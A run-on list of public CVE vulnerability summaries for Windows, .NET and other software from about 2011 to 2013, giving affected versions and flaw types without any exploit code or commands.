Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2972] The (1) server and (2) agent components in CA ARCserve Backup r12.5, r15, and r16 on Windows do not properly validate RPC requests, which allows remote attackers to cause a denial of service (service crash) via a crafted request. [CVE-2012-2971] The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does not properly process RPC requests, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted request. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka 